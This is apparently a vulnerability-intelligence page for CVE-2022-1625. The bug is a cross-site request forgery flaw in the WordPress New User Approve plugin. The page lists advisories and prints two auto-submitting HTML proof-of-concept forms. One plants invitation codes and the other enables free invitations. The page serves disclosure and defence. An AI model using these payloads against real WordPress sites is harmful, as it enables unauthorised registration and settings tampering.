New User Approve - Security Vulnerabilitie
Reporter | Title | Published | Views | Family All 7 |
---|---|---|---|---|
CNVD | WordPress New User Approve pluginθ·¨η«θ―·ζ±δΌͺι ζΌζ΄ | 30 Jun 202200:00 | β | cnvd |
Prion | Cross site request forgery (csrf) | 27 Jun 202209:15 | β | prion |
Cvelist | CVE-2022-1625 New User Approve < 2.4 - Arbitrary Settings Update & Invitation Code Creation via CSRF | 27 Jun 202208:57 | β | cvelist |
Patchstack | WordPress New User Approve plugin <= 2.3 - Arbitrary Settings Update & Invitation Code Creation via CSRF vulnerability | 1 Jun 202200:00 | β | patchstack |
WPVulnDB | New User Approve < 2.4 - Arbitrary Settings Update & Invitation Code Creation via CSRF | 1 Jun 202200:00 | β | wpvulndb |
NVD | CVE-2022-1625 | 27 Jun 202209:15 | β | nvd |
CVE | CVE-2022-1625 | 27 Jun 202209:15 | β | cve |
Add codes:
<form id="test" action="https://example.com/wp-admin/admin.php?page=nua-invitation-code" method="POST">
<textarea name="nua_manual_add[codes]">test
sesame-open
let-me-in
</textarea>
<input type="text" name="nua_manual_add[usage_limit]" value="99">
<input type="text" name="nua_manual_add[expiry_date]" value="2022-04-30">
<input type="text" name="nua_manual_add[submit]" value="Save Changes">
</form>
<script>
document.getElementById("test").submit();
</script>
Update Settings:
<form id="test" action="https://example.com/wp-admin/admin.php?page=nua-invitation-code&action=Settings" method="POST">
<input type="text" name="nua_free_invitation" value="enable">
<input type="text" name="nua_inv_code_submit" value="Save Changes">
</form>
<script>
document.getElementById("test").submit();
</script>
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo